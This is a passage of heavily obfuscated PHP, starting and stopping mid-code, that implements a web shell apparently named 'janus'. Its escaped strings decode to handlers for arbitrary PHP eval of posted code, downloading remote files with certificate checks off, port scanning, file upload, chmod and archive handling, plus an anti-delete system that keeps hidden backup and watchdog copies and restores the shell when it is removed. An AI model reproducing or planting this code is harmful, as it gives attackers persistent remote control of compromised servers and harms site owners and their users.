"\x43\141\x6e\156\x6f\164\40\x64\x65\154\x65\x74\145\40\x64\151\x72\x65\143\x74\x6f\162\x79\x20\x63\x6f\x6e\164\141\x69\x6e\151\x6e\147\x20\x70\x72\157\x74\x65\143\164\x65\144\x20\x73\150\x65\154\x6c"]; goto DfDDj; FEEZ2: $Yxoh6 = $ggdpe . DIRECTORY_SEPARATOR . "\56\152\141\x6e\x75\163\137\x62\x61\143\153\x75\160\137" . substr(md5($QEiJ4), 0, 12) . "\x2e\x70\x68\x70"; goto GRe04; a6uBB: goto vbH70; goto oj0UH; hXA_H: $v1Pog = ["\x73\x74\x61\164\165\x73" => "\145\x72\x72\x6f\162", "\155\145\x73\163\x61\147\x65" => "\x43\141\156\x6e\157\x74\40\144\145\154\145\x74\x65\x20\155\x61\151\156\x20\x73\150\x65\154\x6c\40\x2d\40\x50\162\157\x74\145\143\164\145\x64\x20\142\x79\x20\141\x6e\164\x69\55\x64\145\154\145\x74\145\x20\163\171\x73\164\x65\x6d"]; goto I1ABG; tGRDi: $nZiB9 = basename($QEiJ4); goto Cf0Aj; WDuwx: $PZWZj = dirname($j3_hR); goto ejHgm; tvA7r: goto vbH70; goto F7VzT; Wxbeq: hYQCh: goto FFraB; v26Yh: goto vbH70; goto DS3V3; ZqkmC: $v1Pog = ["\x73\x74\x61\164\x75\163" => "\145\x72\x72\157\162", "\x6d\145\x73\x73\141\147\x65" => "\103\x61\x6e\x6e\x6f\164\40\144\145\x6c\x65\x74\145\x20\x6d\x61\151\156\x20\163\x68\145\154\154\40\x2d\x20\120\162\157\x74\x65\x63\164\x65\144\x20\x62\171\x20\x61\156\164\151\x2d\144\x65\154\145\164\145\40\x73\x79\x73\164\145\155"]; goto tvA7r; m3_Wv: $v1Pog = ["\163\x74\x61\164\165\x73" => "\x73\165\x63\143\145\x73\163", "\155\x65\x73\x73\x61\x67\145" => "\x46\151\x6c\145\x20\x64\x65\154\x65\x74\145\x64\56"]; goto zZPL4; Rp1gP: $v1Pog = ["\163\164\x61\164\165\x73" => "\145\162\x72\x6f\162", "\155\x65\163\163\141\147\x65" => "\x43\141\156\x6e\157\x74\40\x64\x65\154\x65\164\145\40\155\x61\x69\156\40\x73\x68\x65\154\x6c\40\x2d\x20\120\x72\x6f\x74\145\143\164\x65\144\x20\x62\x79\x20\141\156\164\x69\x2d\x64\x65\154\x65\x74\x65\x20\163\x79\163\x74\x65\155"]; goto pY4zM; EYP2d: $ggdpe = dirname($QEiJ4); goto tGRDi; iQdN_: $v1Pog = ["\x73\164\141\x74\165\163" => "\x65\x72\x72\x6f\162", "\155\145\x73\x73\x61\147\145" => "\103\x61\x6e\x6e\157\x74\x20\144\145\x6c\145\x74\145\40\x6d\x61\x69\x6e\40\163\150\x65\x6c\x6c\40\x2d\40\120\x72\157\x74\145\143\164\145\144\x20\x62\171\x20\141\156\164\151\x2d\x64\145\x6c\x65\164\x65\40\163\x79\163\164\145\x6d"]; goto a6uBB; wFHeh: hFsNg: goto Po3Zk; xS3Lg: goto vbH70; goto IlYls; RICih: if ($oqpyj) { goto z1aRC; } goto V0jaO; zlrsV: if (!(strcasecmp($GQZ_c, $rdKfF) === 0)) { goto RAFtB; } goto ZId3W; CG0fA: $GQZ_c = str_replace(["\57", "\134"], DIRECTORY_SEPARATOR, $j3_hR); goto NcU5J; F7VzT: wLZYO: goto hMU63; j3NuU: NBwqI: goto KbEXH; UA3x4: $gQaoB = @realpath($qr3P0); goto F9vAT; FFraB: d64T_: goto zdZoq; ix5o9: a7m0A: goto XUl6j; HdHIJ: $v1Pog = ["\163\164\x61\x74\x75\163" => "\145\x72\162\157\x72", "\x6d\145\x73\x73\141\147\x65" => "\103\x61\x6e\x6e\x6f\x74\x20\144\145\x6c\145\164\x65\x20\155\141\x69\156\40\x73\x68\x65\154\154\x20\x2d\x20\x50\162\x6f\164\x65\x63\164\x65\144\x20\142\x79\40\x61\156\x74\x69\55\x64\x65\154\145\x74\x65\x20\x73\x79\163\164\x65\155"]; goto xS3Lg; wHIQW: J9GwM: goto Dgmpo; g49L8: if (!is_dir($j3_hR)) { goto rznnd; } goto Qx66i; a9dQq: if (!($olcCz && $HkI9D && $olcCz === $HkI9D)) { goto wLZYO; } goto ZqkmC; Po3Zk: if (Igctv($j3_hR)) { goto wE_11; } goto lH5zm; GRe04: if (!file_exists($etpkF)) { goto H6YzQ; } goto DqOkv; lH5zm: $v1Pog["\155\145\x73\x73\x61\147\x65"] = "\103\157\165\x6c\144\40\156\157\x74\x20\x64\145\154\x65\x74\x65\40\144\151\x72\x65\143\x74\157\x72\x79\x2e"; goto wMmeW; wMmeW: goto hYQCh; goto TbCcS; ZId3W: $v1Pog = ["\163\x74\141\164\x75\x73" => "\x65\162\x72\157\162", "\155\145\163\163\141\147\145" => "\x43\141\x6e\x6e\x6f\164\x20\144\145\154\x65\x74\x65\40\x6d\141\151\156\40\x73\150\x65\x6c\154\40\55\x20\120\x72\157\x74\x65\x63\x74\145\x64\40\142\171\x20\x61\156\x74\x69\x2d\144\145\x6c\145\164\x65\x20\x73\171\163\x74\x65\x6d"]; goto zMK30; Dgmpo: $oqpyj = @unlink($j3_hR); goto RICih; aeI4l: if (file_exists($QEiJ4)) { goto kEoO1; } goto Tm5vP; V0jaO: $v1Pog["\155\x65\163\163\141\x67\x65"] = "\x43\157\165\154\144\40\156\157\x74\x20\144\x65\154\145\x74\x65\x20\146\151\154\145\56\x20\106\x69\154\145\40\155\141\171\x20\142\x65\x20\160\x72\157\x74\x65\x63\x74\x65\x64\40\157\162\40\x6c\x6f\x63\x6b\145\x64\56"; goto Tr2yy; XUl6j: $v1Pog = ["\x73\164\x61\x74\x75\x73" => "\145\x72\x72\x6f\x72", "\155\x65\163\163\141\147\x65" => "\123\150\145\x6c\154\x20\x64\x65\x6c\x65\164\151\x6f\156\40\144\145\164\x65\143\164\145\x64\40\x61\156\x64\x20\162\145\x73\x74\x6f\162\x65\x64\x20\x2d\40\120\162\x6f\164\x65\143\164\x65\144\40\x62\171\40\x61\156\164\x69\x2d\x64\145\x6c\145\164\145\40\x73\171\163\x74\145\x6d"]; goto Kd2Mq; Qx66i: $qr3P0 = $j3_hR . DIRECTORY_SEPARATOR . $nZiB9; goto fi2cM; CrQKs: $QEiJ4 = __FILE__; goto EYP2d; zdZoq: goto vbH70; goto HMSRV; IaCbU: foreach ($Osjnh as $G6Mdr) { goto dklkY; dklkY: if (!(stripos($ur1Jt, $G6Mdr) !== false)) { goto hRXZ8; } goto FZjUZ; SWcoL: goto vbH70; goto uGftl; uGftl: hRXZ8: goto AwiJx; FZjUZ: $v1Pog = ["\163\x74\x61\x74\165\x73" => "\145\x72\x72\x6f\x72", "\x6d\x65\163\163\x61\x67\x65" => "\x43\141\156\156\x6f\x74\x20\x64\145\x6c\145\x74\x65\40\x70\x72\x6f\164\x65\x63\x74\145\x64\40\163\171\163\164\145\155\40\146\151\x6c\145\163"]; goto SWcoL; AwiJx: rjT4_: goto qdbRl; qdbRl: } goto zyGXu; KaRam: $Osjnh = ["\x2e\152\141\156\165\163\x5f\142\x61\x63\153\165\x70\x5f", "\56\x6a\141\x6e\165\163\137\167\x61\164\x63\150\x64\157\x67\x5f", "\x2e\x6a\x61\x6e\165\x73\x5f\163\145\x63\162\x65\x74\137", "\56\150\164\141\143\143\x65\163\x73"]; goto IaCbU; Tm5vP: $etpkF = $ggdpe . DIRECTORY_SEPARATOR . "\x2e\152\141\156\165\x73\x5f\x77\x61\x74\143\150\144\x6f\147\137" . substr(md5($QEiJ4), 0, 8) . "\56\160\150\x70"; goto FEEZ2; YdeFh: $yPpFX = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($j3_hR, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); goto I3J3P; Kd2Mq: goto vbH70; goto co0jg; kruBg: $v1Pog = ["\x73\164\x61\x74\x75\x73" => "\145\x72\162\157\162", "\155\145\x73\163\x61\147\145" => "\x43\x61\156\x6e\157\164\40\144\x65\x6c\x65\164\145\x20\155\x61\x69\156\40\163\x68\145\x6c\x6c\40\55\40\x50\162\x6f\164\145\x63\x74\145\x64\x20\x62\x79\x20\x61\x6e\x74\x69\x2d\144\x65\x6c\x65\164\145\x20\163\x79\163\164\145\x6d"]; goto v26Yh; GsWrX: usleep(100000); goto aeI4l; ABP52: mesR1: goto YdeFh; C8S2Y: if (!(!file_exists($QEiJ4) && file_exists($Yxoh6))) { goto a7m0A; } goto kIlGH; VZ1Ud: if (!(stripos($j3_hR, $nZiB9) !== false)) { goto mM8HH; } goto YJDmQ; E4CiQ: $v1Pog = ["\163\x74\x61\x74\x75\x73" => "\x73\165\x63\143\145\163\x73", "\x6d\145\163\163\x61\x67\x65" => "\x44\x69\162\145\143\x74\157\162\171\40\144\x65\x6c\145\164\145\144\56"]; goto Wxbeq; PEwnB: $ThaiK = @realpath($ggdpe); goto sY7Nn; pY4zM: goto vbH70; goto pRsJc; DS3V3: X7zM5: goto OPLDA; Tr2yy: goto jGyKK; goto yxqKY; DqOkv: $kmHPp = true; goto VD6lB; I1ABG: goto vbH70; goto M6G_H; zZPL4: jGyKK: goto Xo9K4; IlYls: j7ZU9: goto M0AbG; BqY0T: RAFtB: goto WDuwx; M0AbG: if (!(strcasecmp($PZWZj, $ggdpe) === 0)) { goto X7zM5; } goto kruBg; YJDmQ: $qr3P0 = $j3_hR; goto g49L8; M6G_H: Qmvot: goto lpPDn; D83Oe: $DpsPY = @fileinode($j3_hR); goto qJ1d2; ovH4C: $cxJYn = @realpath($PZWZj); goto PEwnB; VD6lB: @(include_once $etpkF); goto KdCjS; hMU63: if (!function_exists("\146\151\x6c\145\x69\156\157\x64\145")) { goto J9GwM; } goto D83Oe; yosQd: if (!($DpsPY && $mKAfh && $DpsPY === $mKAfh)) { goto T0Dxc; } goto iQdN_; OPLDA: gUZ7r: goto VZ1Ud; zyGXu: lBSRX: goto mfrmD; NcU5J: $rdKfF = str_replace(["\57", "\x5c"], DIRECTORY_SEPARATOR, $QEiJ4); goto zlrsV; fi2cM: rznnd: goto UA3x4; qJ1d2: $mKAfh = @fileinode($QEiJ4); goto yosQd; TbCcS: wE_11: goto E4CiQ; F9vAT: if (!($gQaoB && $HkI9D && $gQaoB === $HkI9D)) { goto Qmvot; } goto hXA_H; Xo9K4: goto d64T_; goto j3NuU; I3J3P: foreach ($yPpFX as $Q0s1i) { goto PnxbJ; cNVlI: goto vbH70; goto TslY7; wyxry: if (!($SnMVM && $HkI9D && $SnMVM === $HkI9D)) { goto zz5wj; } goto p6deb; iDO1y: $SnMVM = @realpath($Q0s1i->getPathname()); goto wyxry; hfXjz: AUflp: goto HFQ4Z; HFQ4Z: IXGDo: goto v4SCg; TslY7: zz5wj: goto hfXjz; p6deb: $v1Pog = ["\x73\x74\141\x74\165\163" => "\x65\x72\x72\157\162", "\155\145\x73\x73\x61\147\x65" => "\x43\x61\156\156\157\x74\40\x64\145\154\x65\x74\x65\x20\x64\x69\162\145\x63\x74\157\162\171\x20\x63\x6f\156\x74\141\x69\156\151\156\147\x20\x70\162\157\164\145\x63\164\145\144\40\x73\150\145\154\x6c"]; goto cNVlI; PnxbJ: if (!($Q0s1i->isFile() && strcasecmp($Q0s1i->getFilename(), $nZiB9) === 0)) { goto AUflp; } goto iDO1y; v4SCg: } goto wFHeh; DfDDj: goto vbH70; goto ABP52; AxJhG: $HkI9D = @realpath($QEiJ4); goto s827Q; lpPDn: mM8HH: goto KaRam; X3cWT: if (!(strcasecmp($ur1Jt, $nZiB9) === 0)) { goto gUZ7r; } goto ovH4C; zMK30: goto vbH70; goto BqY0T; pRsJc: eNwjD: goto CG0fA; oj0UH: T0Dxc: goto wHIQW; ejHgm: $ur1Jt = basename($j3_hR); goto X3cWT; HMSRV: case "\143\x72\145\141\x74\145": goto J9v3t; zbcCV: $v1Pog = ["\x73\164\141\x74\165\x73" => "\x73\165\143\x63\x65\x73\x73", "\x6d\x65\163\163\x61\147\145" => "\104\x69\x72\145\143\x74\x6f\162\x79\x20\x63\162\x65\x61\164\x65\x64\x2e"]; goto nW7as; U83AU: goto KRa2N; goto Tn7Ne; Yku0J: if (touch($j3_hR)) { goto roOcg; } goto PfDc2; k2toK: k3dW7: goto ZeXSZ; bXLAd: goto vbH70; goto kGh7S; Qrndt: if (!file_exists($j3_hR)) { goto Y6pe4; } goto l8XaG; ZeXSZ: KRa2N: goto T0MeF; VnMWm: $shC_W = $_POST["\164\171\160\x65"]; goto Qrndt; LZnYm: N5RuX: goto zbcCV; r9GSS: $v1Pog["\155\145\163\x73\x61\x67\145"] = "\x43\157\165\x6c\x64\x20\x6e\157\x74\x20\143\162\x65\x61\x74\x65\x20\144\x69\x72\x65\x63\x74\157\162\171\x2e"; goto Pubbu; nW7as: V5rRl: goto U83AU; PkzvM: if ($shC_W === "\x66\151\154\x65") { goto mfhWb; } goto PdqSh; B0Y4i: goto k3dW7; goto H4vTd; l8XaG: $v1Pog["\x6d\145\163\x73\x61\x67\x65"] = "\106\x69\x6c\x65\40\157\162\x20\144\151\x72\x65\143\x74\x6f\x72\171\40\x61\154\162\x65\141\144\171\x20\x65\170\x69\163\x74\163\x2e"; goto bXLAd; T0MeF: goto vbH70; goto G8p4D; PdqSh: if (mkdir($j3_hR)) { goto N5RuX; } goto r9GSS; J9v3t: $j3_hR = $_SESSION["\143\x77\144"] . DIRECTORY_SEPARATOR . $_POST["\156\141\155\145"]; goto VnMWm; Pubbu: goto V5rRl; goto LZnYm; PfDc2: $v1Pog["\155\x65\163\x73\141\147\145"] = "\x43\157\x75\154\144\x20\156\x6f\164\40\143\x72\x65\x61\x74\145\40\x66\x69\x6c\145\56"; goto B0Y4i; Tn7Ne: mfhWb: goto Yku0J; q4Lnj: $v1Pog = ["\163\x74\x61\x74\x75\x73" => "\163\165\x63\143\145\163\163", "\x6d\145\x73\x73\141\147\145" => "\x46\151\x6c\x65\40\x63\x72\145\x61\164\x65\x64\x2e"]; goto k2toK; H4vTd: roOcg: goto q4Lnj; kGh7S: Y6pe4: goto PkzvM; G8p4D: case "\162\x65\156\141\x6d\145": goto AY1dk; ksgDe: goto vbH70; goto FkjXR; yPH1x: goto N5KWq; goto rkZWv; ZL5Jm: $p2MYL = dirname($uqrdm) . DIRECTORY_SEPARATOR . $_POST["\156\145\167\116\x61\x6d\x65"]; goto KUiPO; kRDwK: N5KWq: goto ksgDe; v_GSM: $v1Pog["\155\x65\x73\x73\x61\x67\145"] = "\x52\x65\156\141\155\x65\x20\146\141\x69\154\x65\144\x2e"; goto yPH1x; rkZWv: ASVgM: goto XBkBf; AY1dk: $uqrdm = $_POST["\160\141\164\x68"]; goto ZL5Jm; KUiPO: if (rename($uqrdm, $p2MYL)) { goto ASVgM; } goto v_GSM; XBkBf: $v1Pog = ["\163\164\141\164\165\163" => "\163\x75\x63\x63\145\163\x73", "\155\x65\163\163\141\147\145" => "\122\145\156\x61\155\x65\144\x20\163\x75\143\x63\x65\163\163\146\165\x6c\154\x79\56"]; goto kRDwK; FkjXR: case "\x63\x68\155\x6f\144": goto nHWBt; aHYq1: $jluOC = intval($_POST["\160\145\162\155\163"], 8); goto GhQqv; eyLpJ: $v1Pog = ["\x73\164\141\164\165\x73" => "\x73\x75\143\x63\x65\163\163", "\155\x65\x73\163\141\x67\x65" => "\120\145\x72\x6d\151\163\x73\151\157\156\x73\x20\x63\150\x61\x6e\x67\145\x64\56"]; goto t4fyN; eDW7u: goto vbH70; goto f0XkR; BgLKU: goto mOM7L; goto PcJf3; nHWBt: $j3_hR = $_POST["\x70\x61\164\150"]; goto aHYq1; fmR2w: $v1Pog["\x6d\x65\x73\163\141\x67\145"] = "\103\110\x4d\117\x44\x20\146\x61\x69\x6c\x65\x64\56"; goto BgLKU; PcJf3: B8HnN: goto eyLpJ; GhQqv: if (chmod($j3_hR, $jluOC)) { goto B8HnN; } goto fmR2w; t4fyN: mOM7L: goto eDW7u; f0XkR: case "\172\x69\x70": goto bx0NL; wzvSK: $usT2s->addFile($j3_hR, basename($j3_hR)); goto j0LTy; lFhqj: goto vbH70; goto bJdrS; l9cj6: $v1Pog = ["\163\164\x61\164\165\163" => "\163\x75\x63\x63\x65\163\x73", "\x6d\x65\x73\163\x61\147\x65" => "\101\162\x63\150\x69\x76\x65\40\x63\x72\145\x61\164\x65\144\40\x73\165\143\143\145\x73\163\146\x75\x6c\154\171\x2e"]; goto cwm19; KHKYE: VeYvt: goto Ei2ed; bx0NL: if (class_exists("\132\x69\x70\101\x72\x63\x68\151\166\x65")) { goto mnfLH; } goto Yxlg0; cwm19: w9kH0: goto UBd1N; i5a3z: mnfLH: goto rm6IA; QwfNm: $v1Pog["\x6d\145\163\x73\x61\x67\145"] = "\132\151\x70\40\x61\x72\143\x68\151\x76\145\x20\141\x6c\162\145\x61\144\171\x20\x65\x78\151\x73\164\x73\x2e"; goto lFhqj; gAL1V: if (!file_exists($uU6_P)) { goto b0dt9; } goto QwfNm; bJdrS: b0dt9: goto wIlNP; Yxlg0: $v1Pog["\x6d\145\163\x73\141\x67\145"] = "\x5a\x69\x70\101\x72\x63\150\x69\166\145\x20\143\154\141\x73\163\x20\x6e\x6f\164\x20\146\157\165\x6e\x64\x2e"; goto QgxXx; XF4aF: foreach ($p2RFD as $zME47 => $Q0s1i) { goto WvVZr; SZiai: $sCC_n = substr($JB_SP, strlen(realpath($j3_hR)) + 1); goto Nio1v; KrwTr: fi_E9: goto AU3J7; AU3J7: jO02z: goto JrP5Q; WvVZr: if ($Q0s1i->isDir()) { goto fi_E9; } goto k1oke; Nio1v: $usT2s->addFile($JB_SP, $sCC_n); goto KrwTr; k1oke: $JB_SP = $Q0s1i->getRealPath(); goto SZiai; JrP5Q: } goto lNuiE; dzd77: $usT2s->close(); goto l9cj6; x0qYI: if (is_dir($j3_hR)) { goto VeYvt; } goto wzvSK; bJ3kt: $uU6_P = rtrim($j3_hR, "\x2f") . "\x2e\x7a\151\x70"; goto gAL1V; hk7qc: DWIlk: goto dzd77; Nbgic: $v1Pog["\x6d\x65\x73\163\141\147\x65"] = "\103\x6f\165\x6c\144\40\156\157\x74\x20\x63\x72\x65\x61\x74\145\x20\x7a\151\160\40\x61\x72\x63\x68\x69\166\145\x2e"; goto fX7jh; j0LTy: goto DWIlk; goto KHKYE; UBd1N: goto vbH70; goto SjlR7; QgxXx: goto vbH70; goto i5a3z; qUNOG: if ($usT2s->open($uU6_P, EDUek::KK30f | Eduek::uMEzX) === TRUE) { goto FzlaQ; } goto Nbgic; Ei2ed: $p2RFD = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($j3_hR, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::LEAVES_ONLY); goto XF4aF; wIlNP: $usT2s = new EDUek(); goto qUNOG; fX7jh: goto w9kH0; goto CoRun; rm6IA: $j3_hR = $_POST["\160\x61\x74\x68"]; goto bJ3kt; lNuiE: GkgFF: goto hk7qc; CoRun: FzlaQ: goto x0qYI; SjlR7: case "\x75\156\172\151\160": goto rvhVr; twRQD: $usT2s->close(); goto Ngj4x; wCSCM: yRaGh: goto mVBnb; JrCjm: goto vbH70; goto kEZ7E; G3e_9: goto vbH70; goto pBEJx; lqxkF: $v1Pog["\155\x65\x73\x73\x61\x67\x65"] = "\103\157\x75\x6c\144\40\156\157\x74\x20\145\170\x74\162\x61\x63\164\40\141\162\143\150\x69\166\x65\56"; goto kaQJN; DzQzC: $j3_hR = $_POST["\x70\141\x74\150"]; goto eG_rK; rvhVr: if (class_exists("\x5a\x69\160\x41\162\143\150\x69\166\x65")) { goto oay5v; } goto nPGz8; Ngj4x: $v1Pog = ["\x73\164\141\164\x75\x73" => "\163\x75\x63\x63\x65\163\163", "\155\145\163\x73\141\x67\x65" => "\101\162\143\x68\151\x76\x65\x20\x65\170\164\162\x61\143\164\145\144\x2e"]; goto pOUGZ; eG_rK: $usT2s = new eDUEk(); goto g3PuE; kEZ7E: oay5v: goto DzQzC; kaQJN: goto aDSeR; goto wCSCM; mVBnb: $usT2s->extractTo(dirname($j3_hR)); goto twRQD; g3PuE: if ($usT2s->open($j3_hR) === TRUE) { goto yRaGh; } goto lqxkF; nPGz8: $v1Pog["\155\145\x73\x73\x61\x67\145"] = "\132\x69\x70\x41\x72\143\x68\151\166\x65\x20\143\154\x61\163\163\40\156\x6f\164\40\146\157\165\x6e\x64\x2e"; goto JrCjm; pOUGZ: aDSeR: goto G3e_9; pBEJx: case "\160\x68\x70\137\x65\166\x61\154": goto n2zU_; wtmCI: ini_set("\x64\x69\x73\160\x6c\141\171\137\x65\162\162\157\x72\x73", $ajFWl); goto f7n6k; euk4Q: try { goto pzvSY; I8V7q: @eval($RFZ8l); goto rrLEl; pzvSY: $RFZ8l = $_POST["\143\157\144\x65"] ?? ''; goto PGhix; rrLEl: HBur_: goto Qe9yy; PGhix: if (empty($RFZ8l)) { goto HBur_; } goto I8V7q; Qe9yy: $BKvy0 = ob_get_clean(); goto OqgHS; OqgHS: } catch (ParseError $smUM0) { ob_end_clean(); $uBrXO = "\120\x61\162\163\145\x20\x65\x72\x72\x6f\162\x3a\x20" . $smUM0->getMessage(); } catch (Throwable $smUM0) { ob_end_clean(); $uBrXO = "\105\162\x72\x6f\x72\72\x20" . $smUM0->getMessage(); } catch (Exception $smUM0) { ob_end_clean(); $uBrXO = "\105\x78\143\x65\x70\x74\x69\x6f\x6e\x3a\x20" . $smUM0->getMessage(); } goto dLsQw; F6bKE: $v1Pog = ["\163\164\141\164\165\x73" => "\145\x72\162\x6f\162", "\x6d\x65\163\163\x61\147\x65" => $uBrXO]; goto nsgcw; dlsGl: goto vbH70; goto bsLLN; kgjbl: $ajFWl = ini_get("\x64\x69\x73\160\x6c\141\171\137\x65\x72\x72\x6f\x72\x73"); goto xV_m9; xV_m9: ini_set("\144\151\163\x70\154\x61\x79\x5f\145\x72\162\x6f\x72\x73", 0); goto T8wAj; PxK1L: $gIoO1 = set_error_handler(function ($UQIjB, $Pb5Yu, $LMk47, $h2CRI) { return true; }, E_ALL); goto POTnZ; Zn6UQ: $kxMRq = error_reporting(0); goto kgjbl; gaPeN: error_reporting($kxMRq); goto wtmCI; YVIzN: fg3os: goto gaPeN; OGelP: $v1Pog["\x6d\x65\x73\163\141\147\x65"] = "\145\x76\x61\154\x28\51\x20\151\x73\x20\x64\151\163\x61\x62\154\145\x64\x2e"; goto aPSLB; T8wAj: ob_start(); goto PxK1L; aPSLB: goto HGL_z; goto YtPSa; nsgcw: yp4NR: goto z6tsq; YtPSa: XpHwq: goto Zn6UQ; jrMob: restore_error_handler(); goto YVIzN; POTnZ: $uBrXO = null; goto euk4Q; z6tsq: HGL_z: goto dlsGl; uujFD: $v1Pog = ["\x73\164\x61\164\165\163" => "\x73\165\x63\143\145\x73\163", "\157\165\164\160\x75\x74" => $BKvy0 ?: '']; goto lbzVI; dLsQw: if (!($gIoO1 !== null)) { goto fg3os; } goto jrMob; lbzVI: goto yp4NR; goto oD0As; oD0As: DgW9c: goto F6bKE; f7n6k: if ($uBrXO !== null) { goto DgW9c; } goto uujFD; n2zU_: if (LIX3f("\145\x76\141\154")) { goto XpHwq; } goto OGelP; bsLLN: case "\167\x67\x65\164": goto rTFil; PU03o: ucsk7: goto zauSH; kPrDE: H7aw8: goto cfiLe; T8O7p: $Lrz4Z = @file_get_contents($INZQZ, false, $yr3s9); goto hhopg; qL_4S: $v1Pog["\x6d\145\163\163\x61\147\x65"] = "\x46\141\x69\154\145\144\40\x74\x6f\x20\x73\141\x76\x65\40\144\157\167\x6e\154\x6f\x61\x64\145\x64\40\146\x69\x6c\x65\x2e"; goto w2m5f; cfiLe: if (file_put_contents($_SESSION["\143\x77\144"] . DIRECTORY_SEPARATOR . $YOfeG, $Lrz4Z) !== false) { goto QD3BJ; } goto qL_4S; w2m5f: goto wAlyJ; goto zTFvf; aWH1h: $v1Pog = ["\x73\x74\141\x74\x75\163" => "\163\165\143\143\145\x73\163", "\x6d\x65\163\163\141\147\x65" => "\x46\151\x6c\x65\x20\144\x6f\x77\x6e\154\x6f\x61\x64\x65\144\x20\163\x75\143\143\145\163\x73\x66\165\154\x6c\x79\56"]; goto G2eeM; zTFvf: QD3BJ: goto aWH1h; jTDID: $v1Pog["\155\x65\x73\163\141\x67\x65"] = "\x46\x61\151\x6c\x65\x64\x20\164\x6f\x20\144\x6f\x77\156\154\157\x61\x64\40\x66\x72\x6f\155\x20\125\x52\x4c\x2e\40\103\x68\145\143\153\x20\125\122\x4c\40\x61\x6e\x64\40\156\x65\164\x77\157\162\153\x20\x63\157\156\156\145\x63\x74\151\x76\151\164\171\56"; goto YOKrz; rTFil: $INZQZ = $_POST["\x75\x72\x6c"]; goto GDWLZ; G2eeM: wAlyJ: goto PU03o; Xv4_W: aCMGX: goto uW6mX; h80eU: $yr3s9 = stream_context_create($xd_Oi); goto T8O7p; mXDtq: if (!empty($YOfeG)) { goto aCMGX; } goto mJGdX; QzNy8: $xd_Oi = ["\x68\x74\x74\x70" => ["\x6d\145\x74\150\157\144" => "\x47\105\x54", "\150\x65\x61\144\145\x72" => "\x55\163\x65\x72\x2d\x41\x67\145\x6e\164\x3a\x20{$c0OAM}\xd\xa\x41\x63\143\145\160\x74\72\x20\x74\x65\170\x74\x2f\x68\x74\155\x6c\x2c\141\160\160\154\151\x63\x61\x74\x69\157\x6e\57\170\150\x74\x6d\154\53\170\x6d\x6c\x2c\x61\160\160\154\151\143\x61\164\151\x6f\x6e\57\170\x6d\x6c\x3b\161\x3d\x30\56\x39\54\52\x2f\52\73\x71\x3d\x30\56\70\15\xa\x41\x63\143\x65\x70\x74\55\114\141\156\x67\165\141\x67\x65\72\x20\x65\156\x2d\125\123\x2c\145\156\73\x71\x3d\x30\x2e\x35\15\xa\x41\143\143\145\x70\164\x2d\105\x6e\143\x6f\x64\x69\156\147\72\40\x67\x7a\x69\160\x2c\40\144\x65\146\x6c\141\164\145\15\12\103\x6f\156\156\145\143\164\x69\157\156\72\x20\x6b\x65\x65\160\x2d\x61\154\x69\166\145", "\x74\151\x6d\x65\x6f\x75\x74" => 30, "\146\157\154\154\157\167\x5f\154\x6f\143\141\x74\151\x6f\x6e" => true, "\155\141\x78\x5f\162\x65\144\151\x72\145\143\x74\163" => 5, "\x69\147\156\x6f\162\145\137\x65\162\162\x6f\x72\163" => false], "\x73\163\x6c" => ["\x76\145\x72\x69\146\171\x5f\x70\x65\x65\162" => false, "\166\x65\x72\151\x66\171\x5f\x70\x65\x65\x72\137\x6e\x61\155\x65" => false, "\x61\154\154\157\x77\x5f\163\145\154\146\x5f\x73\x69\147\156\x65\x64" => true]]; goto h80eU; uW6mX: $c0OAM = z0nvP(); goto QzNy8; mJGdX: $YOfeG = "\144\157\x77\156\x6c\157\141\x64\145\144\x5f\x66\151\x6c\x65"; goto Xv4_W; YOKrz: goto ucsk7; goto kPrDE; zauSH: goto vbH70; goto af_JG; hhopg: if ($Lrz4Z !== false) { goto H7aw8; } goto jTDID; GDWLZ: $YOfeG = basename(parse_url($INZQZ, PHP_URL_PATH)); goto mXDtq; af_JG: case "\x70\157\x72\x74\x5f\163\x63\141\156": goto d3ls9; rQrFh: $wYTCp = array_filter(array_map("\164\162\x69\155", explode("\54", $_POST["\x70\157\x72\x74\x73"]))); goto iEi1Y; vL2Sg: goto vbH70; goto EbHyy; d3ls9: if (lIX3f("\x66\x73\157\143\153\x6f\x70\x65\x6e")) { goto bNIZH; } goto Qmq76; M7Qww: goto vbH70; goto oGVH_; kfYp2: eJUql: goto TuBkz; TuBkz: $v1Pog = ["\163\x74\x61\x74\165\x73" => "\163\165\x63\143\x65\163\163", "\162\145\163\165\154\x74\163" => $gSi8X]; goto M7Qww; ppbal: $NFCPX = $_POST["\x68\157\163\x74"]; goto rQrFh; Qmq76: $v1Pog["\155\145\163\163\x61\147\x65"] = "\x66\163\x6f\x63\153\157\160\x65\156\50\51\x20\x69\x73\x20\144\x69\x73\x61\142\x6c\x65\144\56"; goto vL2Sg; zYaBI: foreach ($wYTCp as $TI0F5) { goto s0zsN; lY5d1: Vvndw: goto h86wJ; TVlef: O9o4H: goto MrM9R; s0zsN: $DvmKO = @fsockopen($NFCPX, $TI0F5, $UQIjB, $Pb5Yu, 0.2); goto Bpieo; eSIAO: PTFjj: goto TVlef; iO7ce: $gSi8X[$TI0F5] = "\103\x6c\157\163\x65\144"; goto A0SyM; xP0UG: fclose($DvmKO); goto eSIAO; h86wJ: $gSi8X[$TI0F5] = "\117\x70\x65\156"; goto xP0UG; A0SyM: goto PTFjj; goto lY5d1; Bpieo: if (is_resource($DvmKO)) { goto Vvndw; } goto iO7ce; MrM9R: } goto kfYp2; iEi1Y: $gSi8X = []; goto zYaBI; EbHyy: bNIZH: goto ppbal; oGVH_: case "\x75\x70\154\x6f\141\144": goto s9oDZ; trX1k: $j2G7g = []; goto LqAcO; v33sA: iWuMj: goto BwG09; dDEUO: RpIFq: goto ciV15; M3SvM: $j2G7g[] = ["\156\141\x6d\x65" => $_FILES["\x66\151\x6c\145"]["\156\x61\x6d\145"][$jY45d], "\164\155\160\x5f\x6e\141\x6d\145" => $_FILES["\x66\x69\154\x65"]["\x74\x6d\x70\137\156\141\x6d\x65"][$jY45d]]; goto Oyhbl; Nn4IB: goto z6GII; goto dDEUO; LqAcO: if (is_array($_FILES["\x66\151\x6c\x65"]["\156\x61\155\x65"])) { goto iHTh1; } goto OfGLi; qX9ti: iHTh1: goto OPa81; XKkOG: goto vbH70; goto ke7m7; BLj_8: goto oiETu; goto jB72h; EEx0l: $j3_hR = rtrim($_POST["\x70\141\164\x68"], "\57"); goto trX1k; t__gi: JVari: goto UPEJR; Oyhbl: p2nhH: goto SXY0K; 